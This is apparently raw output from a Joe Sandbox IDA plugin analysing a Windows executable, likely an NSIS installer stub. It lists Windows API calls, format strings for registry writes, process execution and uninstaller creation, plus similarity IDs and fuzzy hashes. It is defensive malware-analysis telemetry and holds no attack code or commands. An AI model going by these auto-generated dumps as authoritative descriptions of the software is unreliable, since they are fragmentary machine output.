                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                            • wsprintfA.USER32 ref: 00406B4D
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                              • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                              • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                            • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                            Similarity
                                                                            • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                            • String ID: F$%s=%s$NUL$[Rename]
                                                                            • API String ID: 565278875-1653569448
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                            • DeleteObject.GDI32(?), ref: 004010F6
                                                                            • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                            • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                            • DeleteObject.GDI32(?), ref: 0040116E
                                                                            • EndPaint.USER32(?,?), ref: 00401177
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            APIs
                                                                            • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                            • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                            • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            Strings
                                                                            • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                            • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                            • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                            • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                            • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                            • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                            Similarity
                                                                            • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                            • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                            • API String ID: 1641139501-220328614
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                            • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                            • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                            Strings
                                                                            • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                            Similarity
                                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                            • String ID: created uninstaller: %d, "%s"
                                                                            • API String ID: 3294113728-3145124454
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                            • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                            • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                            • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                            • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                            Similarity
                                                                            • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                            • String ID: RMDir: RemoveDirectory invalid input("")
                                                                            • API String ID: 3734993849-2769509956
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                            • GetSysColor.USER32(00000000), ref: 00403E00
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                            • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                            • GetSysColor.USER32(?), ref: 00403E2B
                                                                            • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                            • DeleteObject.GDI32(?), ref: 00403E55
                                                                            • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
APIs
• GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
• LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
• FreeLibrary.KERNEL32(?,?), ref: 004024C3
Strings
• Error registering DLL: Could not load %s, xrefs: 004024DB
• Error registering DLL: Could not initialize OLE, xrefs: 004024F1
• Error registering DLL: %s not found in %s, xrefs: 0040249A
Memory Dump Source
• Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
Similarity
• API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
• String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
• API String ID: 1033533793-945480824
• Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
• Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
• Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
• Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
APIs
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
  • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
  • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
• WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
• GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
Strings
• Exec: command="%s", xrefs: 00402241
• Exec: success ("%s"), xrefs: 00402263
• Exec: failed createprocess ("%s"), xrefs: 004022C2
Memory Dump Source
• Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
Similarity
• API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
• String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
• API String ID: 2014279497-3433828417
• Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
• Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
• Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
• Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
• GetMessagePos.USER32 ref: 00404871
• ScreenToClient.USER32(?,?), ref: 00404889
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
• Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
• Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
• Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
• MulDiv.KERNEL32(00010E00,00000064,?), ref: 00403295
• wsprintfW.USER32 ref: 004032A5
• SetWindowTextW.USER32(?,?), ref: 004032B5
• SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
Strings
• verifying installer: %d%%, xrefs: 0040329F
Memory Dump Source
• Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
• Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
• Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
• Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
• Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
APIs
• lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
• wsprintfW.USER32 ref: 00404457
• SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s$@rD
• API String ID: 3540041739-1813061909
• Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
• Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
• Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
• Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
• CharNextW.USER32(?,?,?,00000000), ref: 004060AA
• CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
• CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":
• API String ID: 589700163-165019052
• Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
• Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
• Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
• Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
• RegCloseKey.ADVAPI32(?), ref: 00401504
• RegCloseKey.ADVAPI32(?), ref: 00401529
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
Memory Dump Source
• Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
Similarity
• API ID: Close$DeleteEnumOpen
• String ID:
• API String ID: 1912718029-0
• Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
• Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
• Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
• Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
APIs
• GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
• GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
• GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
• VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
• GlobalFree.KERNEL32(00000000), ref: 00402387
Memory Dump Source
• Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
Similarity
• API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
• String ID:
• API String ID: 3376005127-0
• Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
• Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
• Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
• Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                            • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                            • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                            • String ID:
                                                                            • API String ID: 2568930968-0
                                                                            • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                            • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                            • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                            • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                            APIs
                                                                            • GetDlgItem.USER32(?), ref: 004020A3
                                                                            • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                            • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                            • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                            • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                            • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                            • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                            • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                            • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                            APIs
                                                                              • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
